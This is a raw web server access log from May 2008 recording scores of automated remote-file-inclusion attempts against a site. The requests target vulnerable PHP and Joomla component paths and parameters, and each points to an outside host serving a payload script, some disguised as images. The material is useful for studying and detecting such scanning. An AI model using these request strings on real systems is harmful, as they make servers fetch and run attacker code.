195.34.78.106 - - [05/May/2008:10:27:57 -0700] "GET /logs/access_080114.log/scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:28:01 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.166.35.71 - - [05/May/2008:10:28:03 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:28:13 -0700] "GET /logs/scanhttp://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.31.133 - - [05/May/2008:10:28:13 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.thom.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:28:13 -0700] "GET /scanhttp://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.31.133 - - [05/May/2008:10:28:14 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.thom.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:28:16 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:28:17 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:28:17 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:10:28:21 -0700] "GET /index.php?option=com_dfcontact&task=&catid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.30.73.117 - - [05/May/2008:10:28:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [05/May/2008:10:28:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.92.140.30 - - [05/May/2008:10:28:31 -0700] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.140.30 - - [05/May/2008:10:28:31 -0700] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:28:43 -0700] "GET /logs/scanhttp://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:28:44 -0700] "GET /scanhttp://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:28:59 -0700] "GET /scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:29:09 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.154.101 - - [05/May/2008:10:29:12 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.101 - - [05/May/2008:10:29:12 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:29:34 -0700] "GET /logs/@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:29:35 -0700] "GET /@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:29:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.192.249 - - [05/May/2008:10:29:51 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.192.249 - - [05/May/2008:10:29:51 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:29:54 -0700] "GET /display.php?pag=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.151.111 - - [05/May/2008:10:30:00 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.151.111 - - [05/May/2008:10:30:12 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.151.111 - - [05/May/2008:10:30:13 -0700] "GET /common/db.php?commonpath=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:30:53 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:30:53 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:30:54 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:10:31:02 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:10:31:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:10:31:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:10:31:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:31:09 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:10:31:11 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:31:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:31:23 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:31:43 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:31:43 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:31:44 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:22 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:22 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:22 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:23 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://www.hotelmorena.de/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:23 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:23 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:23 -0700] "GET /common/db.php?commonpath=http://www.hotelmorena.de/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:23 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.76.155.52 - - [05/May/2008:10:32:23 -0700] "GET /logs/common/db.php?commonpath=http://www.hotelmorena.de/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:32:53 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:32:53 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:33:36 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [05/May/2008:10:33:39 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:33:42 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:33:52 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:33:56 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:33:57 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:33:59 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:34:00 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:34:04 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:34:06 -0700] "GET /logs/scanhttp://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:34:06 -0700] "GET /scanhttp://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:34:43 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:34:44 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:34:57 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:34:57 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:34:57 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:35:11 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:35:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:35:43 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:35:43 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:35:43 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:36:03 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:36:04 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [05/May/2008:10:36:04 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [05/May/2008:10:36:05 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [05/May/2008:10:36:05 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:36:12 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:36:12 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:36:28 -0700] "GET /logs/access_080114.log/scanhttp://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:36:29 -0700] "GET /logs/access_080122.log/scanhttp://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:36:52 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:37:05 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:17 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:17 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:18 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:37:33 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:38 -0700] "GET /logs/access_080226.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:38 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:39 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:47 -0700] "GET /logs/access_080228.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:37:48 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:37:49 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:37:50 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:37:51 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:37:51 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [05/May/2008:10:37:52 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:37:52 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:37:55 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:38:17 -0700] "GET /auto.php?inc=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.166.35.71 - - [05/May/2008:10:39:04 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.239.170.75 - - [05/May/2008:10:39:25 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [05/May/2008:10:39:28 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [05/May/2008:10:39:28 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:39:39 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:39:40 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:10:39:43 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 46126 "-" "libwww-perl/5.808" "www.dmulk.com"
